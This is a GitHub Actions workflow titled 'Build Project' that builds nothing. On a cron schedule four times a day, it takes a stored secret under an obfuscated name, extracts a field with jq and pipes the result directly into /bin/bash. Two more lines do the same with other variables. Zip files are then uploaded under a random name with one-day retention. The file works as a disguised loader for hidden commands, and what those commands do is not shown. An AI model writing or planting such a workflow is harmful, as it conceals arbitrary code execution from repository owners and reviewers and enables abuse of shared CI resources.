name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '46 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          ctylh079: ${{ secrets.ctylh079 }}
        run: |
          printf '%s' "$ctylh079" | jq -r .e79848 | /bin/bash
          printf '%s' "$npbj895" | jq -r .w08108 | /bin/bash
          echo $yz6 | jq -r .b3751 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 9f9UrJWy
          path: "*.zip"
          retention-days: 1
